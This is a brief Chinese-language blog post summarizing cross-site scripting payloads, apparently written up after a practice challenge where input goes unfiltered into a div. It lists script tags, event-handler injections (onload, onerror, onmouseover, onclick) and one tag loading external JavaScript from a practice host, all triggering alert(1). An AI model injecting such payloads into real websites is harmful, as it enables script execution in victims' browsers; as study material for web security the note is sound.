XSS

date
Aug 5, 2021 12:17 PM
Related to 日程数据 1 (blog)
tags
Blog
slug
xss
summary
xss
膜拜大神
无任何过滤直接往div标签内写内容,直接上payload即可。下面将本次用到的XSS payload小结如下:
<script>alert(1)</script>
<body onload=alert(1)>
<body/onload=alert(1)>
<svg onload=alert(1)>
<svg/onload=alert(1)>
<img src onerror=alert(1)>
<input type=image src onerror=alert(1)>
<script src="https://xss.haozi.me/j.js"></script>//加载外部js
<input type=button onclick="alert(1)">//点击按钮
<input onmouseover=alert(1)>//鼠标指针移动到指定的元素上时执行
<input onmousemove=alert(1)>//鼠标移动时执行
......还有其他onmouse系列
<img src=javascript: onmouseover="alert(1)">//鼠标移动指向图片
<img src=javascript: onclick="alert(1)">//鼠标点击图片
 

© lewoking 2021 - 2022